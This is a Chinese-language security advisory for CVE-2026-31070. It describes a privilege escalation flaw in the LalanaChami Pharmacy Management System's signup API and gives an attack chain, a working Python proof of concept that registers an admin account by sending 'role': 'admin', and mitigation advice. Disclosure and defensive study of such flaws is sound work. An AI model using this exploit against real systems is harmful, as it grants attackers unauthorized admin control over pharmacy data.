CVE-2026-31070 CVSS 9.8 严重

CVE-2026-31070 LalanaChami药房权限提升漏洞

披露日期: 2026-05-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-31070

漏洞类型

权限提升

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

LalanaChami Pharmacy Management System

漏洞概述

LalanaChami药房管理系统存在严重权限提升漏洞。在commit 5c3d028版本中，/api/user/signup接口未对请求体中的角色参数进行校验，允许未经认证的攻击者在注册时自行分配管理员角色，从而获取系统最高权限。

技术细节

该漏洞源于后端注册接口缺乏对输入参数的严格验证。在处理用户注册时，系统直接信任客户端提交的数据，未对role参数进行强制过滤或重置。攻击者可构造包含"role": "admin"的恶意POST请求发送至/api/user/signup。由于服务端未限制默认角色，攻击者创建的账户直接获得管理员权限，绕过了正常的权限分配流程。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出目标系统运行LalanaChami药房管理系统，并定位到注册接口/api/user/signup。

STEP 2

2. 构造恶意请求

攻击者使用工具（如Burp Suite或Python脚本）构造HTTP POST请求，在请求体中将role参数修改为“admin”。

STEP 3

3. 发送利用请求

向目标服务器发送包含篡改role参数的注册请求。

STEP 4

4. 权限提升与控制

服务器创建拥有管理员权限的新账户，攻击者使用该账户登录系统，获得完全控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_url):
    url = f"{target_url}/api/user/signup"
    headers = {"Content-Type": "application/json"}
    # Malicious payload setting role to admin
    data = {
        "username": "hacker_admin",
        "password": "StrongPass123!",
        "role": "admin" 
    }
    
    try:
        response = requests.post(url, json=data, headers=headers)
        if response.status_code == 200 or response.status_code == 201:
            print("[+] Exploit successful! Admin user created.")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Exploit failed. Status: {response.status_code}")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    exploit("http://target-ip")

影响范围

LalanaChami Pharmacy Management System commit 5c3d028

防御指南

临时缓解措施

建议立即修复后端代码逻辑，确保注册接口不接受自定义角色参数。在官方补丁发布前，应在网络边界（如WAF）部署规则，拦截向注册接口提交包含特定role参数的请求，或暂时关闭公开注册功能。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表